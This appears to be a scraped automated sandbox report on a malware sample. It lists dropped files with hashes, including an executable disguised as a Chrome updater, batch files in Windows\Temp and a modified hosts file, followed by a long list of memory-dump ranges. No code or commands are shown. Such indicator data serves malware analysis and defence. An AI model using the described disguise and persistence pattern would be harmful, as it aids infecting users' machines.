                                                MITRE ATT&CK Enterprise v6

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Program Files\Google\Chrome\updater.exe
                                                  Filesize

                                                  7.3MB

                                                  MD5

                                                  baeb20fb698c26b6f053215674129767

                                                  SHA1

                                                  5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                                  SHA256

                                                  99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                                  SHA512

                                                  a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                                • C:\Program Files\Google\Chrome\updater.exe
                                                  Filesize

                                                  7.3MB

                                                  MD5

                                                  baeb20fb698c26b6f053215674129767

                                                  SHA1

                                                  5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                                  SHA256

                                                  99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                                  SHA512

                                                  a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                  Filesize

                                                  3KB

                                                  MD5

                                                  8592ba100a78835a6b94d5949e13dfc1

                                                  SHA1

                                                  63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                  SHA256

                                                  fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                  SHA512

                                                  87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  1KB

                                                  MD5

                                                  bfbf877befce8f66da4791719f6e2d57

                                                  SHA1

                                                  47061ee37f01fe0d80b37d9c3a238a489d9d1d45

                                                  SHA256

                                                  d0501d635127a75ba65359fcd17a181cbaf6a38848a6d6351619e5672a5e7103

                                                  SHA512

                                                  69dd158bc88b4a99478c46c1a74db446c4ea6824917d8d52dd1f3297f9743d07d6a8bd64e348efe8b1e9503c8619a9ab10f2e6ac47f8a089aa3c20fa54fb9ae6

                                                • C:\Windows\Temp\lol.bat
                                                  Filesize

                                                  59B

                                                  MD5

                                                  f580e0e80cc87b25e38ea2c0c8059d04

                                                  SHA1

                                                  299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                  SHA256

                                                  9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                  SHA512

                                                  5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                • C:\Windows\Temp\run.bat
                                                  Filesize

                                                  98B

                                                  MD5

                                                  731afe244b2414169a5f630d52646e56

                                                  SHA1

                                                  e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                  SHA256

                                                  6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                  SHA512

                                                  84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                • C:\Windows\Temp\setup.exe
                                                  Filesize

                                                  7.3MB

                                                  MD5

                                                  baeb20fb698c26b6f053215674129767

                                                  SHA1

                                                  5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                                  SHA256

                                                  99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                                  SHA512

                                                  a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                                • C:\Windows\Temp\setup.exe
                                                  Filesize

                                                  7.3MB

                                                  MD5

                                                  baeb20fb698c26b6f053215674129767

                                                  SHA1

                                                  5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                                  SHA256

                                                  99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                                  SHA512

                                                  a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                  Filesize

                                                  3KB

                                                  MD5

                                                  17286868c0a043ae5d2ff5798b6a3163

                                                  SHA1

                                                  b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

                                                  SHA256

                                                  40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

                                                  SHA512

                                                  e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  1KB

                                                  MD5

                                                  d0bcbadb3ebcd041605f37019119c0b6

                                                  SHA1

                                                  36b16a2b0e025d40ec5a783cf78ad2ff7c38f288

                                                  SHA256

                                                  20e15db7d6cf2bca7a2922cc9c4939e643b82beb7378adab586910ceed994a8b

                                                  SHA512

                                                  f4fc3762d7d6ffbe10838458d13d6ff3aaa5fdc18e72ecd30697c76c83733d526eb868aa014e404861a6bf8b6881e3cda232f84444b5ba354a390fd87ea3f43a

                                                • C:\Windows\system32\drivers\etc\hosts
                                                  Filesize

                                                  2KB

                                                  MD5

                                                  c5227366b7a688ff23b01788718251aa

                                                  SHA1

                                                  9795262e79c832ba49c744fcd1b1794c0ffb5c6a

                                                  SHA256

                                                  789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

                                                  SHA512

                                                  8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

                                                • memory/64-224-0x000001D3255F0000-0x000001D325A0E000-memory.dmp
                                                  Filesize

                                                  4.1MB

                                                • memory/64-204-0x000001D30A610000-0x000001D30AA2E000-memory.dmp
                                                  Filesize

                                                  4.1MB

                                                • memory/216-328-0x0000000000000000-mapping.dmp
                                                • memory/216-653-0x0000000000000000-mapping.dmp
                                                • memory/988-265-0x000001E3AF710000-0x000001E3AF786000-memory.dmp
                                                  Filesize

                                                  472KB

                                                • memory/988-258-0x000001E3AF560000-0x000001E3AF582000-memory.dmp
                                                  Filesize

                                                  136KB

                                                • memory/988-248-0x0000000000000000-mapping.dmp
                                                • memory/1020-331-0x0000000000000000-mapping.dmp
                                                • memory/1040-330-0x0000000000000000-mapping.dmp
                                                • memory/1196-323-0x0000000000000000-mapping.dmp
                                                • memory/1196-338-0x0000000000000000-mapping.dmp
                                                • memory/1212-335-0x0000000000000000-mapping.dmp
                                                • memory/1308-183-0x0000000000000000-mapping.dmp
                                                • memory/1392-320-0x0000000000000000-mapping.dmp
                                                • memory/1428-333-0x0000000000000000-mapping.dmp
                                                • memory/1592-324-0x0000000000000000-mapping.dmp
                                                • memory/1812-649-0x0000000000000000-mapping.dmp
                                                • memory/1812-321-0x0000000000000000-mapping.dmp
                                                • memory/2136-651-0x0000000000000000-mapping.dmp
                                                • memory/2144-336-0x0000000000000000-mapping.dmp
                                                • memory/2252-329-0x0000000000000000-mapping.dmp
                                                • memory/2388-322-0x0000000000000000-mapping.dmp
                                                • memory/2420-211-0x00007FFAABDB0000-0x00007FFAABF8B000-memory.dmp
                                                  Filesize

                                                  1.9MB

                                                • memory/2420-180-0x0000000000000000-mapping.dmp
                                                • memory/2420-196-0x00007FFAABDB0000-0x00007FFAABF8B000-memory.dmp
                                                  Filesize

                                                  1.9MB

                                                • memory/2420-193-0x0000000000400000-0x00000000010BF000-memory.dmp
                                                  Filesize

                                                  12.7MB

                                                • memory/2420-207-0x0000000000400000-0x00000000010BF000-memory.dmp
                                                  Filesize

                                                  12.7MB

                                                • memory/2636-332-0x0000000000000000-mapping.dmp
                                                • memory/2700-325-0x0000000000000000-mapping.dmp
                                                • memory/2700-658-0x0000000000000000-mapping.dmp
                                                • memory/2720-184-0x0000000000000000-mapping.dmp
                                                • memory/3248-337-0x0000000000000000-mapping.dmp
                                                • memory/3324-650-0x0000000000000000-mapping.dmp
                                                • memory/3736-652-0x0000000000000000-mapping.dmp
                                                • memory/3744-334-0x0000000000000000-mapping.dmp
                                                • memory/3748-648-0x0000000000000000-mapping.dmp
                                                • memory/3760-319-0x0000000000000000-mapping.dmp
                                                • memory/3940-169-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-124-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-165-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-163-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-168-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-170-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-171-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-137-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-173-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-172-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-174-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-175-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-176-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-177-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-178-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-179-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-167-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-122-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-126-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-164-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-162-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-161-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-160-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-128-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-157-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-159-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-130-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-136-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-135-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-134-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-133-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-132-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-158-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-117-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-131-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-152-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-155-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-139-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-129-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-127-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-156-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-153-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-154-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-151-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-140-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-141-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-138-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-143-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-146-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-118-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-119-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-116-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-120-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-145-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-125-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-166-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-144-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-142-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-150-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-147-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-148-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-123-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-149-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3940-121-0x0000000077230000-0x00000000773BE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3992-655-0x0000000000000000-mapping.dmp
                                                • memory/4064-654-0x0000000000000000-mapping.dmp
                                                • memory/4084-339-0x0000000000000000-mapping.dmp
                                                • memory/4092-657-0x0000000000000000-mapping.dmp
                                                • memory/4116-674-0x0000000000000000-mapping.dmp
                                                • memory/4168-675-0x0000021F45450000-0x0000021F45462000-memory.dmp
                                                  Filesize

                                                  72KB

                                                • memory/4168-663-0x0000021F45420000-0x0000021F45426000-memory.dmp
                                                  Filesize

                                                  24KB

                                                • memory/4220-373-0x0000000000000000-mapping.dmp
                                                • memory/4248-692-0x0000000140000000-0x0000000140809000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/4248-690-0x0000000140000000-0x0000000140809000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/4268-379-0x0000000000000000-mapping.dmp
                                                • memory/4300-380-0x0000000000000000-mapping.dmp
                                                • memory/4300-518-0x000001F519000000-0x000001F5190B9000-memory.dmp
                                                  Filesize

                                                  740KB

                                                • memory/4300-477-0x0000000000000000-mapping.dmp
                                                • memory/4300-555-0x000001F518990000-0x000001F51899A000-memory.dmp
                                                  Filesize

                                                  40KB

                                                • memory/4300-495-0x000001F518970000-0x000001F51898C000-memory.dmp
                                                  Filesize

                                                  112KB

                                                • memory/4316-381-0x0000000000000000-mapping.dmp
                                                • memory/4340-382-0x0000000000000000-mapping.dmp
                                                • memory/4460-383-0x0000000000000000-mapping.dmp
                                                • memory/4472-645-0x0000000000000000-mapping.dmp
                                                • memory/4480-384-0x0000000000000000-mapping.dmp
                                                • memory/4504-385-0x0000000000000000-mapping.dmp
                                                • memory/4524-386-0x0000000000000000-mapping.dmp
                                                • memory/4548-646-0x0000000000000000-mapping.dmp
                                                • memory/4568-391-0x0000000000000000-mapping.dmp
                                                • memory/4620-393-0x0000000000000000-mapping.dmp
                                                • memory/4696-656-0x0000000000000000-mapping.dmp
                                                • memory/4712-670-0x0000000000000000-mapping.dmp
                                                • memory/4752-659-0x0000000000000000-mapping.dmp
                                                • memory/4756-666-0x0000000000000000-mapping.dmp
                                                • memory/4780-667-0x0000000000000000-mapping.dmp
                                                • memory/4836-660-0x0000000000000000-mapping.dmp
                                                • memory/4840-668-0x0000000000000000-mapping.dmp
                                                • memory/4844-661-0x0000000000000000-mapping.dmp
                                                • memory/4864-669-0x0000000000000000-mapping.dmp
                                                • memory/4892-662-0x0000000000000000-mapping.dmp
                                                • memory/4908-427-0x00007FFAABDB0000-0x00007FFAABF8B000-memory.dmp
                                                  Filesize

                                                  1.9MB

                                                • memory/4908-467-0x00007FFAABDB0000-0x00007FFAABF8B000-memory.dmp
                                                  Filesize

                                                  1.9MB

                                                • memory/4908-463-0x0000000000400000-0x00000000010BF000-memory.dmp
                                                  Filesize

                                                  12.7MB

                                                • memory/4908-417-0x0000000000000000-mapping.dmp
                                                • memory/4908-426-0x0000000000400000-0x00000000010BF000-memory.dmp
                                                  Filesize

                                                  12.7MB

                                                • memory/4940-684-0x0000016C90590000-0x0000016C90597000-memory.dmp
                                                  Filesize

                                                  28KB

                                                • memory/4940-680-0x0000016C90DE0000-0x0000016C90DE6000-memory.dmp
                                                  Filesize

                                                  24KB

                                                • memory/4948-664-0x0000000000000000-mapping.dmp
                                                • memory/4964-665-0x0000000000000000-mapping.dmp
                                                • memory/5004-671-0x0000000000000000-mapping.dmp
                                                • memory/5084-672-0x0000000000000000-mapping.dmp
                                                • memory/5092-673-0x0000000000000000-mapping.dmp